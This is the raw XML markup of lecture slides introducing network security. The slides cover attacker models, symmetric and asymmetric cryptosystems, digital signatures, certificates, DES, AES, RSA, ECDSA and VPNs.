            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="114999"/>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Spy only intercepted the encrypted text</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="114999"/>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for hacking, "brute force" is used</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="357641" lvl="0" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="114999"/>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Spy also recognized the encrypted and corresponding decrypted text (for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Caesar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>F(x)=x+k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>this is a disaster)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="114999"/>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Spy also knows the encryption algorithm with the encryption key (man-in-the-middle attack)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pP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ED5FE28D-DF6B-4739-9C36-4C45D466E247}"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Encryption / Decryption process</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="39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5E2D19C7-2120-4536-BC46-898289EBB92B}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4444560" y="4133537"/>
            <a:ext cx="254916" cy="24387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7" name="" hidden="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1865247"/>
            <a:ext cx="9143999" cy="46889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Types of Cryptosystems</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="441144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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Symmetric:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> the decryption key is equal to (or easily obtained from) the encryption key</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Problem: how can I transmit such a key over the network?</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="10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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Asymmetric:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> the encryption key is "published in the newspaper", the decryption key is kept secret and is known only to one party</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66860800-21C8-4BAF-A9D4-4C997C76FCFC}"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316080" y="466560"/>
            <a:ext cx="8256240" cy="2962080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="b">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4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Main Components of </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="48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C6CF38D0-0C83-4361-93C1-263FF6D9BF57}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7286760" y="4429080"/>
            <a:ext cx="1142640" cy="157608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i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Public Key Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="39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B2F3B63E-96BD-42E1-B08D-463F02BBF8F7}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4444560" y="4133537"/>
            <a:ext cx="254916" cy="24387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7" name="" hidden="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1997321"/>
            <a:ext cx="9144000" cy="442483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Digital Signature</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8229240" cy="5071680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="9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The problem of asymmetric cryptosystems – active attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>can encrypt a message and send it on someone else's behalf</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="9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Solution – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>put a signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>: the hash from the encrypted message is encrypted with an private DS key and is sent along with the message</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75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70C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DS decryption key is "printed in the newspaper"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> so that everyone can check the sender's signature</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3A594092-C957-44EB-9900-F5B23487DA43}"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Digital Signature</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="39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E72CFD04-3DFD-4878-B9E1-E78D6D6483CB}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="" hidden="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="0" t="0" r="0" b="29659"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="0" flipV="0">
            <a:off x="0" y="1766733"/>
            <a:ext cx="9144000" cy="482395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Certificates</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1571759"/>
            <a:ext cx="8229240" cy="1499759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Problem: how do I prevent an attacker from publishing a fake public key on my behalf?</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10232F93-B987-44F7-956F-DCFAD0DCA4A8}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="0" flipV="0">
            <a:off x="5737878" y="3729069"/>
            <a:ext cx="167931" cy="128775"/>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8" name="" hidden="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="0" flipV="0">
            <a:off x="1293318" y="2715774"/>
            <a:ext cx="6023830" cy="404288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Server Certificate Chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>mail.yandex.ru</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="39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4CE08013-35AA-491F-96EB-BABB3F63F9E3}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="" hidden="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="0" t="0" r="0" b="43324"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="0" flipV="0">
            <a:off x="0" y="2073991"/>
            <a:ext cx="9144000" cy="388681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Types of Symmetric Cryptosystems</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="441144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2401"/>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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DES – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (1977)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, globally used</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>AES – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Advanced Encryption Standard - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>successor of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DES (2001)</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4DD530DE-A523-4720-96D6-4774C269882B}"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Asymmetric Cryptosystems</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="4852800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>RSA (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>PGP – Pretty Good Privacy) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>outdated, slow</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>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i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Knapsack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cryptosystem</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ECDSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Elliptic Curve Digital Signature Algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the most promising one for creating a DS</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7718A1BD-EA5D-4335-A602-BEBDF205244B}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1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VPN – Virtual Private Network</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="39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7BB3577A-0BFC-4C56-AF19-50031088B99E}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="" hidden="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="0" r="7240" b="37724"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="0" flipV="0">
            <a:off x="384072" y="1997177"/>
            <a:ext cx="8481894" cy="427088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316080" y="466560"/>
